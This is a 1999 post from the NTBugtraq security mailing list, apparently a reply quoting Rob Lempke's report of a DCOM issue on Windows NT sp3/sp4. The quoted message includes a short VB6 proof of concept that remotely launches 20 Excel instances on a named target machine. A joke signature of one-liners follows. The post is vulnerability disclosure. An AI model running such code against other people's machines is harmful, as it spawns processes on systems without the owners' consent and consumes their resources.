Re: DCOM attack against NT using VB6

[Matt_Hargett () NAI COM (Hargett, Matt)]

-----Original Message-----
From: Rob Lempke [mailto:rlempke () ADNET2000 COM]
Sent: Wednesday, August 11, 1999 1:27 PM
To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM
Subject: DCOM attack against NT using VB6

Using the code below I was able to create 20 instances of Excel on my
co-workers machines without modifying their machines at all.  The target
must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
prevent the attack.

Private Sub Command1_Click()
    Dim xlObj As Object
    Dim xlCollection As New Collection
    Dim i As Long
    For i = 1 To 20
        Set xlObj = CreateObject("Excel.Application", "\\NTBox")
        xlCollection.Add xlObj
    Next i

    i = 1
    'clean up
    While xlCollection.Count > 0
        xlCollection.Remove (xlCollection.Count)
    Wend
    Set xlCollection = Nothing
End Sub

-Robert E. Lempke
--------------------------------------------
Steven Wright one Liners:
"Black holes are where God divided by zero."
"Quantum Mechanics:  The dreams stuff is made of."
"Early bird gets the worm, but the second mouse gets the cheese."
"If everything seems to be going well, you have obviously overlooked
something."
"Join the Army, meet interesting people, kill them."
"Success always occurs in private, and failure in full view."
"Ambition is a poor excuse for not having enough sense to be lazy."
"Hard work pays off in the future.  Laziness pays off now."
"Everyone has a photographic memory.  Some don't have film."
"Drink until she's cute, but stop before the wedding."
--------------------------------------------